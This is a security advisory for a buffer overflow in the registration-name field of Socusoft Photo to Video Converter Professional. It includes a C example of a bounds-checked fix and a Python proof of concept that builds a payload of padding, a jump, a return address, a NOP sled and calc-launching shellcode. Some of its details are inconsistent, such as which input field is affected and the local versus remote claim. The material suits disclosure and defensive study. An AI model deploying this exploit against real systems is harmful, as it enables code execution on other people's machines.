Socusoft Photo to Video Converter Professional – "Registration Name" Buffer Overflow Exploit

A local buffer overflow vulnerability has been discovered in the official Socusoft Photo to Video Converter Professional software. The vulnerability allows local attackers to overwrite registers (for example EIP) and compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is classified as a classic buffer overflow.

Product & Service Introduction:
===============================

Socusoft Photo to Video Converter Professional is image-to-film conversion software that lets you create all kinds of slideshow videos (mp4, flv, mov, avi, mkv, mpeg, h.264 HD, 3gp, 3gpp2, swf) playable on YouTube, Facebook, MySpace, iPod, iPad, iPhone, Archos, PSP, Zune.

(Copy of the Vendor Homepage: http://www.dvd-photo-slideshow.com/)

Date of Discovery:
==================

2018-09-13

Exploitation Technique:
=======================

Local & Remote

Platform Tested:
================

Windows 7

Solution – Fix & Patch:
=======================
Restrict the size of the Set Output folder input and allocate memory accordingly, so that interaction with the vulnerable input field cannot overflow the process.
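
Added example, not the vendor's code and not part of the original advisory: one way to apply the size restriction described above to the "Registration Name" field that the proof of concept targets. The function name, status codes, the 256-byte capacity and the printable-ASCII rule are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed capacity of the name buffer; the real size is not on the page. */
#define REG_NAME_MAX 256

enum reg_status { REG_OK, REG_BAD_ARG, REG_TOO_LONG, REG_BAD_CHAR };

/* Unsafe pattern this replaces (shown as a comment only):
 *     char name[REG_NAME_MAX];
 *     strcpy(name, input);    copies until NUL, however long input is
 */

/* Hypothetical handler: in_len is the byte count reported by the UI control.
   Nothing is written to dst unless every check passes. */
enum reg_status set_registration_name(char *dst, size_t dst_size,
                                      const char *input, size_t in_len)
{
    size_t i;

    if (dst == NULL || dst_size == 0 || input == NULL || in_len == 0)
        return REG_BAD_ARG;

    /* Reject instead of truncating, so oversized input is visible to the
       caller and can be logged. One byte is reserved for the terminator. */
    if (in_len >= dst_size)
        return REG_TOO_LONG;

    /* Assumption: a name is printable ASCII; refuse control and high bytes. */
    for (i = 0; i < in_len; i++)
        if (!isprint((unsigned char)input[i]))
            return REG_BAD_CHAR;

    memcpy(dst, input, in_len);
    dst[in_len] = '\0';
    return REG_OK;
}

int main(void)
{
    char name[REG_NAME_MAX], big[1100];   /* big: constructed oversized input */
    memset(big, 'A', sizeof big);
    printf("normal=%d oversized=%d\n",
           (int)set_registration_name(name, sizeof name, "Jane Doe", 8),
           (int)set_registration_name(name, sizeof name, big, sizeof big));
    return 0;
}
```

Rejecting the input outright, rather than copying a truncated prefix, also gives the application a single place to log registration attempts that exceed the field limit.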

Levels Risk :

Proof of Concept (PoC):
=======================

The local buffer overflow vulnerability can be exploited by local attackers with a restricted system user account and without user interaction. For security demonstration or to reproduce the issue, follow the information and steps provided below.

1. Download and install Photo to Video Converter Professional
2. Run the Python operating script that will create a file (poc.txt)
3. Run the software "" then go to Menu -> Help -> Save
4. Paste the contents of the file (poc.txt) into the input "Registration Name" and click "Activate"
5. Now the calculator executes!

#!/usr/bin/python

from struct import pack
buffer = "\x41" * 256
a = "\xeb\x06\xff\xff"
b = pack("<I",0x10015d71)
calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38"
"\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf"
"\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49"
"\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c"
"\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda"
"\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46"
"\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66"
"\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42"
"\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6"
"\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35"
"\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b"
"\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2"
"\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52"
"\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55"
"\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b"
"\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37"
"\x8b\x15\x7b\xd2\x2b\xbf\x83")
nops = "\x90" * 20
c = "\x44" * 800

poc = buffer + a + b + nops + calc + c
file = open("poc.txt","w")
file.write(poc)
file.close()

print "POC Created by ZwX"
print " Email: msk4@live.fr"
